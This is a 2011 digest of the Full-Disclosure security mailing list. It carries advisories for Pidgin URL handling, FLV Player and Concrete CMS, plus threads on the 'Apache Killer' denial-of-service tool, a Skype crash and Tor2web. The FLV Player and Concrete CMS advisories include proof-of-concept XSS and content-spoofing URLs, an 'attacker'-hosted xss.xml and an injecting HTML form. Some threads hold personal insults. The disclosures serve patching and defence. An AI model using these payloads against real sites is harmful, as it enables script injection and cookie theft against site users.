Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Georgi Guninski
May I ask for a month of William and/or Melinda Gates?

The wikipedia images appear relatively good even without gimp/PS :)

-- 
joro
On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote:
 Hi guys!
 
 Welcome to super duper weekend double post of MOHSEP!!
 
 I hope you all had good weekend as me! This weekend I have day off so played
 36 hours call of duty with no stop. Now my leg like dead. Is ok tho.
 
 Here is this weekend's link!:
 http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html
 
 Until tomorrow!
 
 Herr E Balls

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Insomnia : ISVA-110822.1 - Pidgin IM Insecure URL Handling Remote Code Execution

2011-08-22 Thread Brett Moore
___

 Insomnia Security Vulnerability Advisory: ISVA-110822.1
___

 Name: Pidgin IM Insecure URL Handling Remote Code Execution
 Reported: 21 July 2011
 
 Vendor Link:
http://www.pidgin.im
 
 Affected Products:
Pidgin Instant Messaging Client = 2.9.0
 
 Original Advisory:
http://www.insomniasec.com/advisories/ISVA-110822.1.htm
 
 Researcher:
James Burton, Insomnia Security
http://www.insomniasec.com
___


___

 Description
___

Pidgin is an open source instant messaging client that allows users
to log in to accounts on multiple chat networks simultaneously.

An insecure URL handling vulnerability exists in Pidgin = 2.9.0
that can be exploited to cause remote code execution.

This vulnerability requires user interaction in the form of clicking
a malicious crafted URL.

___

 Details
___

Pidgin supports the use of URL handlers in IM sessions.  The Windows build
passes URLs directly to the ShellExecute API where they are executed under
the context of the user running the application.

When passed through a file:// URL a malicious executable can be hosted
and executed off a remote WEBDAV/SMB share.

This vulnerability requires user interaction in the form of clicking a
crafted URL but Pidgins Insert - Link function gives the option of adding
a description which masks the underlying link. 

This makes the task of social engineering the target a trivial one.

This vulnerability has only been confirmed over Google-Talk though
exploitation over other chat networks may be possible.

___

 Solution
___

Upgrade to Pidgin 2.10.0 from http://www.pidgin.im/
The Pidgin changelog can be found http://developer.pidgin.im/wiki/ChangeLog

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
 Insomnia Security Vulnerability Advisory: ISVA-110822.1
___

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread rackow
Nick FitzGerald made the following keystrokes:
 Will McAfee wrote:
  Less funny than yesterday's.  Just stop.
 More predictable than yesterday's.  Just stop.

My guess is there are 2 things keeping him going.
1. People are looking at the pages.  No matter how much people
complain the truth is they are looking.  He can tell by
checking web logs on his site to see if there is interest.
He probably see's enough people to feel there are enough
seats occupied in his theater to keep the doors opn on 
the current show.

2. Messages like those above indicate people are still looking/
curious as to how bad the latest renditions are going to be.
The critics haven't found a new show yet to generate a better
buzz elsehere.  They keep coming back to his trainwreck.

So, to repeat the phrase to the all of you, Just stop.

--Gene



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-08-22 Thread Kim Henriksen
Could not get this to work

testet on;
Ubuntu 10.04.2 LTS 2.6.32-32-server
Server version: Apache/2.2.14 (Ubuntu)

Vmware guest (2x vcpu's)

top showed nearly 100% cpu usage, but server did not run slowly.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Pedro B.
 
 I hope you all had good weekend as me! This weekend I have day off so played 
 36 hours call of duty with no stop. Now my leg like dead. Is ok tho.

What a pity it is only like dead. A really dead leg would fit your pathetic 
attempts at the english language just perfectly.
Now THAT would be worth a ML post and a photoshopped mockery image.

 Here is this weekend's link!: 
 http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html

We do not care.

--pb
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-08-22 Thread Jari Fredriksson
22.8.2011 11:42, Kim Henriksen kirjoitti:
 Could not get this to work
 
 testet on;
 Ubuntu 10.04.2 LTS 2.6.32-32-server
 Server version: Apache/2.2.14 (Ubuntu)
 
 Vmware guest (2x vcpu's)
 
 top showed nearly 100% cpu usage, but server did not run slowly.
 

I tested it on Debian Squeeze, and the server and whole WMware client
went on knees. Nothing worked but slowly, and Apache restart solved it.

-- 

Q:  What is purple and commutes?
A:  An Abelian grape.



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Apache Killer

2011-08-22 Thread confirm.ed


This email was sent via Anonymous email service for free.
YOU CAN REMOVE THIS TEXT MESSAGE BY BEING A PAID MEMBER FOR $19/year.
Message ID= 114537





http://www.youtube.com/watch?v=fkCQZaVjBhA
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Thor (Hammer of God)
Why not do it yourself?  You seem to have lots of time on your hands these days.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski
Sent: Monday, August 22, 2011 12:38 AM
To: Herr E Balls
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser 
Photoshops - 0x13 + 0x14!

May I ask for a month of William and/or Melinda Gates?

The wikipedia images appear relatively good even without gimp/PS :)

-- 
joro
On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote:
 Hi guys!
 
 Welcome to super duper weekend double post of MOHSEP!!
 
 I hope you all had good weekend as me! This weekend I have day off so played
 36 hours call of duty with no stop. Now my leg like dead. Is ok tho.
 
 Here is this weekend's link!:
 http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html
 
 Until tomorrow!
 
 Herr E Balls

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerabilities in FLV Player

2011-08-22 Thread MustLive
Hello list!

I want to warn you about Content Spoofing and Cross-Site Scripting
vulnerabilities in FLV Player.

-
Affected products:
-

Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and
MULTI). Note, that version NORMAL occurs under names player_flv.swf and
player_flv_classic.swf.

The author of FLV Player didn't fix these vulnerabilities.

--
Details:
--

Content Spoofing (WASC-12):

Flash-files of player FLV Player accept arbitrary addresses in parameter
configxml, which allows to spoof content of flash - i.e. by setting address
of configuration file from other site.

http://site/player_flv.swf?configxml=http://attacker/1.xml

http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml

http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

Flash-files of player FLV Player accept arbitrary addresses in parameter
config, which allows to spoof content of flash - i.e. by setting address of
configuration file from other site.

http://site/player_flv.swf?config=http://attacker/1.txt

http://site/player_flv_maxi.swf?config=http://attacker/1.txt

http://site/player_flv_multi.swf?config=http://attacker/1.txt

Flash-files of player FLV Player allow to spoof all important parameters,
including flv and startimage, and at that accept arbitrary addresses in
parameters flv and startimage, which allows to spoof content of flash - i.e. 
by setting addresses of video and image from other site. And for setting of 
links at arbitrary site it's possible to use parameters onclick and 
ondoubleclick.

http://site/player_flv.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg

http://site/player_flv_maxi.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg

http://site/player_flv_multi.swf?flv=http://attacker/1.flvstartimage=http://attacker/1.jpg

http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml

http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

File xss.xml:

?xml version=1.0 encoding=UTF-8?
config
param name=onclick value=javascript:alert(document.cookie) /
param name=ondoubleclick value=javascript:alert(document.cookie) /
/config

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt

http://site/player_flv_multi.swf?config=http://attacker/xss.txt

File xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code will execute after a click (or double click). It's strictly social
XSS.


Timeline:


2011.02.24 - found these vulnerabilities in different versions of the player
and informed owner of the site which used it.
2011.04.21 - announced at my site.
2011.04.22 - informed developer.
2011.08.20 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5098/).

Best wishes  regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-08-22 Thread HI-TECH .
w00t for the youtube video and nice tune too :

2011/8/20 HI-TECH . isowarez.isowarez.isowa...@googlemail.com:
 Disabling mod_gzip/mod_deflate is a workaround I guess.

 2011/8/20 Moritz Naumann secur...@moritz-naumann.com:
 On 20.08.2011 00:23 HI-TECH . wrote:
 (see attachment)
 /Kingcope

 Works (too) well here. Are there any workarounds other than rate
 limiting or detecting + dropping the traffic IPS-wise?

 Moritz



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] HoG Blog: Don't be so scared, it's only terrorism

2011-08-22 Thread Thor (Hammer of God)
http://www.hammerofgod.com/thorblog.aspx#It^s-Only-Terrorism


Timothy Thor  Mullen
www.hammerofgod.com

Thor's Microsoft Security 
Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
[Description: TMSB-Prod-small]

inline: image001.jpg___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Concrete CMS 5.4.1.1 = Cross Site Scripting

2011-08-22 Thread YGN Ethical Hacker Group
Concrete CMS 5.4.1.1  =  Cross Site Scripting


1. OVERVIEW

Concrete CMS 5.4.1.1  and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Concrete5 makes running a website easy. Go to any page in your site,
and a editing toolbar gives you all the controls you need to update
your website. No intimidating manuals, no complicated administration
interfaces - just point and click.


3. VULNERABILITY DESCRIPTION

The rcID parameter is not properly sanitized, which allows attacker to
conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

CMS 5.4.1.1  =


5. PROOF-OF-CONCEPT/EXPLOIT


vulnerable parameter: rcID

form action=http://[target]/Concrete/index.php/login/do_login/;
method=post
input type=hidden name=uName value=test /
input type=hidden name=uPassword value=test /
input type=hidden name=rcID value='
style=display:block;color:red;width:;height:;z-index:;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/));
onmouseover=alert(/XSS/)' /
input type=submit name=submit value=Get Concrete CMS 5.4.1.1 XSS /
/form


6. SOLUTION

Upgrade to 5.4.2 or higher.


7. VENDOR

Concrete CMS Developers
http://www.concrete5.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-04-14: vulnerability reported
2011-08-04: vendor released fixed version
2011-08-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting
Project Home: http://www.concrete5.org/
Vendor Release Note:
http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/



#yehg [2011-08-23]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Valdis . Kletnieks
On Mon, 22 Aug 2011 12:09:01 +1200, Nick FitzGerald said:
 Will McAfee wrote:
 
  Less funny than yesterday's.  Just stop.
 
 More predictable than yesterday's.  Just stop.

Procmail is your friend.  But thanks for following up, I realized I wasn't 
filtering replies. ;)




pgpFMTL3MCABE.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Pedro B.

On Aug 22, 2011, at 6:41 PM, Herr E Balls wrote:

 Really I dunno what Leg have to do with my english.

As long as you're punished for being a public illiterate AND nuisance, leg will 
fit.


 Really i think you confuse leg with mouth.

Or brain.

 mexican.

Wrong. Dead wrong.
Silly xenophobic illiterate. :)

--pb
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x12

2011-08-22 Thread root
I found the last one actually quite funny.

Please continue but photoshop additional people in humorous and
improbable situations.

On 08/19/2011 09:25 PM, Herr E Balls wrote:
 Hello fans, whitehats, funky-men and welcome to day 19 of MOHSEP
 
 Today I am so tired from reading the full disclosure and chopping french
 fries all day. You know how is.
 
 Anyway here is today's link:
 http://mohsepblog.blogspot.com/2011/08/friday-august-19th-2011.html
 
 Have good weeks ends and dont get sqlmapped by sabu, k? whitehat security
 need you guys to keep finding alert boxes and shit. Is ok.
 
 Until tomorrow!
 
 Herr E Balls :D
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Herr E Balls
wow! is georgi yet another fbsd kernel sploit guninski! I very honour!

Personally I think month of bill gates too similar to month of constipated
stefan esser, people gonna find it too hard to tell difference

plus also when this month done I gonna check myself into psychiatric rehab
for to get over my new addiction to 400% zoom (I currently go around look at
life thru magnific glass when not at computer) and 4loko.

But thanks for interest! Maybe I think about it for next year.

Herr E Balls

On Mon, Aug 22, 2011 at 9:38 AM, Georgi Guninski gunin...@guninski.comwrote:

 May I ask for a month of William and/or Melinda Gates?

 The wikipedia images appear relatively good even without gimp/PS :)

 --
 joro
 On Sun, Aug 21, 2011 at 10:34:53PM +0200, Herr E Balls wrote:
  Hi guys!
 
  Welcome to super duper weekend double post of MOHSEP!!
 
  I hope you all had good weekend as me! This weekend I have day off so
 played
  36 hours call of duty with no stop. Now my leg like dead. Is ok tho.
 
  Here is this weekend's link!:
 
 http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html
 
  Until tomorrow!
 
  Herr E Balls

  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Herr E Balls
Really I dunno what Leg have to do with my english. Really i think you
confuse leg with mouth. Silly mexican.

Herr E Balls

On Mon, Aug 22, 2011 at 1:05 AM, Pedro B. pedro.borra...@gmail.com wrote:


 What a pity it is only like dead. A really dead leg would fit your
 pathetic attempts at the english language just perfectly.
 Now THAT would be worth a ML post and a photoshopped mockery image.

  Here is this weekend's link!:
 http://mohsepblog.blogspot.com/2011/08/saturday-sunday-weekend-super-double.html

 We do not care. DIAF.

 --pb
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability

2011-08-22 Thread Levent Kayan
hello,

http://vulnerability-lab.com/get_content.php?id=180


cheers,
noptrix

-- 
Name: Levent 'noptrix' Kayan
E-Mail: nopt...@lamergarten.net
GPG key: 0x014652c0
Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
Homepage: http://www.noptrix.net/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Tor2web 2.0 is live!

2011-08-22 Thread nix
 Hi all,

 We are glad to announce the release of the new tor2web software.

 For those of you who are not aware of what tor2web is let us give you a
 brief description. The goal of tor2web is that of promoting the use of
 Tor Hidden Services
 (https://www.torproject.org/docs/hidden-services.html.en). Hidden
 Services allow people to run TCP based services without disclosing the
 identity/location of their server. In the specific they allow people to
 anonymously publish content to the web. Also, since you are being
 reached trough the Tor network, you are not required to have a static ip
 address or purchase a domain. This lowers the entry barrier to content
 publishing and protect the content publisher from retaliation and Denial
 of Service attacks.

 The problem though is that Hidden Services are usually only accessible
 by installing a Tor client
 (https://www.torproject.org/projects/torbrowser.html.en). Tor2web
 creates a transport, by acting as a web proxy, between the internet and
 the Tor network. This means that anonymous publishers are able to reach
 a much wider audience. The user visiting a website though tor2web is
 always advised to install a Tor client as by doing so he will protect
 his identity and leverage Hidden Services end-to-end encryption.

 This version of tor2web (called tor2web 2.0) is based on glype PHP web
 proxy (http://www.glype.com) and it is by no means the definitive
 solution. We are currently working on a new design that will be able to
 withstand other attacks that are currently possible.

 What we have implemented is:
 * A clear disclaimer warning the user that the content is not being
 served directly from the server, but it comes from the Tor network
 * Contact forms for abuse complaints and to report broken websites
 * Transparent rewriting of URLs into the tor2web form (i.e.
 so4rmjdiwmqjosxz.onion become so4rmjdiwmqjosxz.tor2web.org)
 * Blocklists to allow a tor2web node maintainer to block particular
 websites, the blocklists are stored in md5 format so the node maintainer
 does not need to store potentially illegal site lists.

 At this current stage we would like the community to stand-up and help
 us by:
 * Finding security and functional bugs in the existing implementation
 * Volounteering to run new tor2web servers:
In this first stage we are looking for reliable systems, run or
 endorsed by trustworthy organizations involved in anonymity and privacy
 research and development.

 For the new release the goals that we wish to further pursue are:
 * Distribute responsibility across multiple actors
 * Minimize the probability of takedown of a tor2web node

 If you want further information on the tor2web project visit:
 Wiki for new developments: http://wiki.tor2web.org/
 Tor2web original website: http://www.tor2web.org
 Github: https://github.com/globaleaks/tor2web-2.0
 Mailing List: tor2web-t...@lists.tor2web.org on http://bit.ly/pxFwNS .
 IRC: irc.oftc.net #tor2web

 Have a nice day,
 Some Random GlobaLeaks Contributors

 Please spread across the anonimity communities and mailing lists

Im involved in anonymity and privacy research and development. I've
recently released NiX Web Proxy Script:
http://myproxylists.com/proxy-script

A fully working online demo: http://myproxylists.com/nix_web_proxy/

PS. Does tor2web require custom modification before you can use a spesific
web proxy software with the project? Im still trying to understand what's
the point in tor2web :)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x12

2011-08-22 Thread Will McAfee
Obvious sock puppet is obvious.

Sent from my iPhone

On Aug 22, 2011, at 1:34 PM, root ro...@fibertel.com.ar wrote:

 I found the last one actually quite funny.
 
 Please continue but photoshop additional people in humorous and
 improbable situations.
 
 On 08/19/2011 09:25 PM, Herr E Balls wrote:
 Hello fans, whitehats, funky-men and welcome to day 19 of MOHSEP
 
 Today I am so tired from reading the full disclosure and chopping french
 fries all day. You know how is.
 
 Anyway here is today's link:
 http://mohsepblog.blogspot.com/2011/08/friday-august-19th-2011.html
 
 Have good weeks ends and dont get sqlmapped by sabu, k? whitehat security
 need you guys to keep finding alert boxes and shit. Is ok.
 
 Until tomorrow!
 
 Herr E Balls :D
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Tor2web 2.0 is live!

2011-08-22 Thread Arturo Filastò
 
 Im involved in anonymity and privacy research and development. I've
 recently released NiX Web Proxy Script:
 http://myproxylists.com/proxy-script
 
 A fully working online demo: http://myproxylists.com/nix_web_proxy/
 
 PS. Does tor2web require custom modification before you can use a spesific
 web proxy software with the project? Im still trying to understand what's
 the point in tor2web :)
 

Cool!

First thing let me clarify what the goal of tor2web is. Tor Hidden
Services are usually only accessible through a Tor enabled browser, what
tor2web does allow people to visit hidden services from the normal web.

It does not claim to guarantee any sort of anonymity on the client side
(this can be achieved by using Tor) but only allow people publishing
content anonymously with Tor hidden service
(https://www.torproject.org/docs/hidden-services.html.en) to be reached
from the normal web.

I have taken a brief look at your software although I do not like the
fact that you are obfuscating your code. For a software that claims
security to be their top priority, hiding code is a very bad practice.

If you decide to release the source code of your software publicly I
will take it into consideration as a possible replacement for the
current tor2web code. However I will *never* use software whose code I
am unable to read.


Thanks for the interest in the tor2web project.


- Art.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Herr E Balls
Thanks valdis, now we know own you with procmail exploit. Is ok.

Herr E balls

On Mon, Aug 22, 2011 at 5:46 PM, valdis.kletni...@vt.edu wrote:

 On Mon, 22 Aug 2011 12:09:01 +1200, Nick FitzGerald said:
  Will McAfee wrote:
 
   Less funny than yesterday's.  Just stop.
 
  More predictable than yesterday's.  Just stop.

 Procmail is your friend.  But thanks for following up, I realized I wasn't
 filtering replies. ;)



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x13 + 0x14!

2011-08-22 Thread Herr E Balls
If you confuse leg with brain no wonder you write such nonsense all the
time. If you try think with you leg, what you try type with? You nose? Is
silly.

An really, I dunno what you saying about xenophobic. Only instrument I play
is triangle

Herr E Balls

On Mon, Aug 22, 2011 at 7:50 PM, Pedro B. pedro.borra...@gmail.com wrote:


 On Aug 22, 2011, at 6:41 PM, Herr E Balls wrote:

  Really I dunno what Leg have to do with my english.

 As long as you're punished for being a public illiterate AND nuisance, leg
 will fit.


  Really i think you confuse leg with mouth.

 Or brain.

  mexican.

 Wrong. Dead wrong.
 Silly xenophobic illiterate. :)

 --pb
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x15

2011-08-22 Thread Herr E Balls
Well guys, the end is near. Now we only have two weeks of MOHSEP left (more
or less). I know, I know. Is verys  sad. But is ok because u know we be back
for special edishons all the time rite? Is ok.

Anyways enjoy todays, is something a bit different. Dont worry about send
feedback here, we read all your bustercarter email channels on the internet
relays blog anyway. Is ok.

Here is todays link:
http://mohsepblog.blogspot.com/2011/08/monday-august-22nd-2011.html

Until tomorrow!

Herr E Balls
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability

2011-08-22 Thread Mario Vilas
Perhaps you should post the contents of the advisory here as well. Many
people won't happily click on a link without any explanations.

On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote:

 hello,

 http://vulnerability-lab.com/get_content.php?id=180


 cheers,
 noptrix

 --
 Name: Levent 'noptrix' Kayan
 E-Mail: nopt...@lamergarten.net
 GPG key: 0x014652c0
 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
 Homepage: http://www.noptrix.net/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Skype 5.3.*.5.2.* Critical Pointer Vulnerability

2011-08-22 Thread Mario Vilas
Oh, and BTW...

--- Violation Exception Log ---
0:034 g
(f10.ed4): Unknown exception  (first chance)
(f10.ed4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c07ca54b ebx=a96959bc ecx=d8f10db2 edx=155f esi=d7263481 edi=3e294540
eip=25c50116 esp=37f91000 ebp=50601616 iopl=0 nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010202
25c50116 cd01int 1
0:000 !exchain
0018e8f8:
Skype+8be3a0 (00cbe3a0)


This doesn't look like an exploitable buffer overflow to me. I think
you just stumbled upon Skype's anti-debug measures.



On Tue, Aug 23, 2011 at 1:02 AM, Mario Vilas mvi...@gmail.com wrote:

 Perhaps you should post the contents of the advisory here as well. Many
 people won't happily click on a link without any explanations.

 On Mon, Aug 22, 2011 at 9:14 PM, Levent Kayan levonka...@gmx.net wrote:

 hello,

 http://vulnerability-lab.com/get_content.php?id=180


 cheers,
 noptrix

 --
 Name: Levent 'noptrix' Kayan
 E-Mail: nopt...@lamergarten.net
 GPG key: 0x014652c0
 Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
 Homepage: http://www.noptrix.net/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 --
 “There's a reason we separate military and the police: one fights the enemy
 of the state, the other serves and protects the people. When the military
 becomes both, then the enemies of the state tend to become the people.”


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tor2web 2.0 is live!

2011-08-22 Thread nix

 Im involved in anonymity and privacy research and development. I've
 recently released NiX Web Proxy Script:
 http://myproxylists.com/proxy-script

 A fully working online demo: http://myproxylists.com/nix_web_proxy/

 PS. Does tor2web require custom modification before you can use a
 spesific
 web proxy software with the project? Im still trying to understand
 what's
 the point in tor2web :)


 Cool!

 First thing let me clarify what the goal of tor2web is. Tor Hidden
 Services are usually only accessible through a Tor enabled browser, what
 tor2web does allow people to visit hidden services from the normal web.

 It does not claim to guarantee any sort of anonymity on the client side
 (this can be achieved by using Tor) but only allow people publishing
 content anonymously with Tor hidden service
 (https://www.torproject.org/docs/hidden-services.html.en) to be reached
 from the normal web.

 I have taken a brief look at your software although I do not like the
 fact that you are obfuscating your code. For a software that claims
 security to be their top priority, hiding code is a very bad practice.


I understand your point but it's always harder to find bugs when you have
no source code.

It's obfuscated because NiX don't have a name yet. If it will become a
brand, I'll have no issues to release the source code.

The software contains very unique parsing engine and other advanced logics
which im not up to publishing to the public unless the above condition has
met. There's no backdoors whatsoever and it does not steal any personal
information. Protected source code also prevents others from using the
software for malicious purposes. We neither will see that easily renamed
derivate work.

